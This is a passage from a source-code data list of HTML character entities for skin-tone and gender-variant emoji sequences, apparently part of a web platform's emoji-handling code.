'&#x1f64d;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f64d;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f64d;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f64d;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f64d;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f64d;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f64d;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f64e;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f64e;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f64e;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f64e;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f64e;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f64e;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f64e;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f64e;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f64e;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f64e;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f6a3;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f6a3;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f6a3;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f6a3;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f6a3;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f6a3;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f6a3;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f6a3;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f6a3;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f6a3;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b4;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b4;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b4;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b4;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b4;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b4;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b4;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b4;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b4;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b4;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b5;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b5;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b5;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b5;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b5;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b5;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b5;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b5;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b5;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b5;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b6;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b6;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b6;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b6;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b6;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b6;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b6;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b6;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f6b6;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f6b6;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f926;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f926;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f926;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f926;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f926;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f926;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f926;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f926;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f926;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f926;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f935;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f935;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f935;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f935;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f935;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f935;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f935;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f935;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f935;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f935;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f937;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f937;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f937;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f937;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f937;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f937;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f937;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f937;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f937;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f937;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f938;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f938;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f938;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f938;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f938;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f938;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f938;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f938;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f938;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f938;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f939;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f939;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f939;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f939;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f939;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f939;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f939;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f939;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f939;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f939;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f93d;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f93d;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f93d;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f93d;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f93d;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f93d;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f93d;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f93d;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f93d;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f93d;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f93e;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f93e;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f93e;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f93e;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f93e;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f93e;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f93e;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f93e;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f93e;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f93e;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9b8;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9b8;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9b8;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9b8;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9b8;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9b8;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9b8;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9b8;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9b8;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9b8;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9b9;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9b9;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9b9;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9b9;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9b9;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9b9;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9b9;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9b9;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9b9;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9b9;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9cd;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9cd;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9cd;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9cd;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9cd;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9cd;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9cd;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9cd;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9cd;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9cd;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9ce;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9ce;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9ce;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9ce;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9ce;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9ce;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9ce;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9ce;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9ce;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9ce;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9cf;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9cf;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9cf;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9cf;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9cf;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9cf;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9cf;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9cf;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9cf;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9cf;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x2695;&#xfe0f;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x2696;&#xfe0f;', '&#x1f9d1;&#x1f3fb;&#x200d;&#x2708;&#xfe0f;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x2695;&#xfe0f;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x2696;&#xfe0f;', '&#x1f9d1;&#x1f3fc;&#x200d;&#x2708;&#xfe0f;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x2695;&#xfe0f;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x2696;&#xfe0f;', '&#x1f9d1;&#x1f3fd;&#x200d;&#x2708;&#xfe0f;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x2695;&#xfe0f;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x2696;&#xfe0f;', '&#x1f9d1;&#x1f3fe;&#x200d;&#x2708;&#xfe0f;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x2695;&#xfe0f;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x2696;&#xfe0f;', '&#x1f9d1;&#x1f3ff;&#x200d;&#x2708;&#xfe0f;', '&#x1f9d4;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d4;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d4;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d4;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d4;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d4;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d4;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d4;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d4;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d4;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d6;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d6;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d6;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d6;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d6;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d6;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d6;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d6;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d6;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d6;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d7;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d7;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d7;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d7;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d7;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d7;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d7;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d7;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d7;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d7;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d8;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d8;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d8;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d8;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d8;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d8;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d8;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d8;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d8;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d8;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d9;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d9;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d9;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d9;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d9;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d9;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d9;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d9;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9d9;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9d9;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9da;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9da;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9da;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9da;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9da;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9da;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9da;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9da;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9da;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9da;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9db;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9db;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9db;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9db;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9db;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9db;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9db;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9db;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9db;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9db;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9dc;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9dc;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9dc;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9dc;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9dc;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9dc;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9dc;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9dc;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9dc;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9dc;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f9dd;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x1f9dd;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x1f9dd;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x1f9dd;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x1f9dd;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x1f9dd;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x1f9dd;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x1f9dd;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x1f9dd;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x1f9dd;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x1f3cb;&#xfe0f;&#x200d;&#x2640;&#xfe0f;', '&#x1f3cb;&#xfe0f;&#x200d;&#x2642;&#xfe0f;', '&#x1f3cc;&#xfe0f;&#x200d;&#x2640;&#xfe0f;', '&#x1f3cc;&#xfe0f;&#x200d;&#x2642;&#xfe0f;', '&#x1f3f3;&#xfe0f;&#x200d;&#x26a7;&#xfe0f;', '&#x1f574;&#xfe0f;&#x200d;&#x2640;&#xfe0f;', '&#x1f574;&#xfe0f;&#x200d;&#x2642;&#xfe0f;', '&#x1f575;&#xfe0f;&#x200d;&#x2640;&#xfe0f;', '&#x1f575;&#xfe0f;&#x200d;&#x2642;&#xfe0f;', '&#x26f9;&#x1f3fb;&#x200d;&#x2640;&#xfe0f;', '&#x26f9;&#x1f3fb;&#x200d;&#x2642;&#xfe0f;', '&#x26f9;&#x1f3fc;&#x200d;&#x2640;&#xfe0f;', '&#x26f9;&#x1f3fc;&#x200d;&#x2642;&#xfe0f;', '&#x26f9;&#x1f3fd;&#x200d;&#x2640;&#xfe0f;', '&#x26f9;&#x1f3fd;&#x200d;&#x2642;&#xfe0f;', '&#x26f9;&#x1f3fe;&#x200d;&#x2640;&#xfe0f;', '&#x26f9;&#x1f3fe;&#x200d;&#x2642;&#xfe0f;', '&#x26f9;&#x1f3ff;&#x200d;&#x2640;&#xfe0f;', '&#x26f9;&#x1f3ff;&#x200d;&#x2642;&#xfe0f;', '&#x26f9;&#xfe0f;&#x200d;&#x2640;&#xfe0f;', '&#x26f9;&#xfe0f;&#x200d;&#x2642;&#xfe0f;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f33e;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f373;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f37c;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f384;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f393;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f3a4;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f3a8;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f3eb;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f3ed;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f4bb;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f4bc;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f527;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f52c;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f680;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f692;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f9af;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f9b0;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f9b1;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f9b2;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f9b3;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f9bc;', '&#x1f468;&#x1f3fb;&#x200d;&#x1f9bd;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f33e;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f373;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f37c;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f384;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f393;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f3a4;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f3a8;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f3eb;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f3ed;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f4bb;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f4bc;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f527;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f52c;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f680;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f692;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f9af;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f9b0;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f9b1;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f9b2;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f9b3;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f9bc;', '&#x1f468;&#x1f3fc;&#x200d;&#x1f9bd;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f33e;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f373;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f37c;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f384;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f393;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f3a4;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f3a8;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f3eb;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f3ed;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f4bb;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f4bc;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f527;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f52c;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f680;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f692;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f9af;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f9b0;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f9b1;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f9b2;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f9b3;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f9bc;', '&#x1f468;&#x1f3fd;&#x200d;&#x1f9bd;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f33e;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f373;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f37c;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f384;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f393;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f3a4;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f3a8;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f3eb;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f3ed;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f4bb;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f4bc;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f527;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f52c;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f680;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f692;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f9af;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f9b0;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f9b1;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f9b2;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f9b3;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f9bc;', '&#x1f468;&#x1f3fe;&#x200d;&#x1f9bd;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f33e;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f373;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f37c;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f384;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f393;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f3a4;', '&#x1f468;&#x1f3ff;&#x200d;&#x1f3a8;', 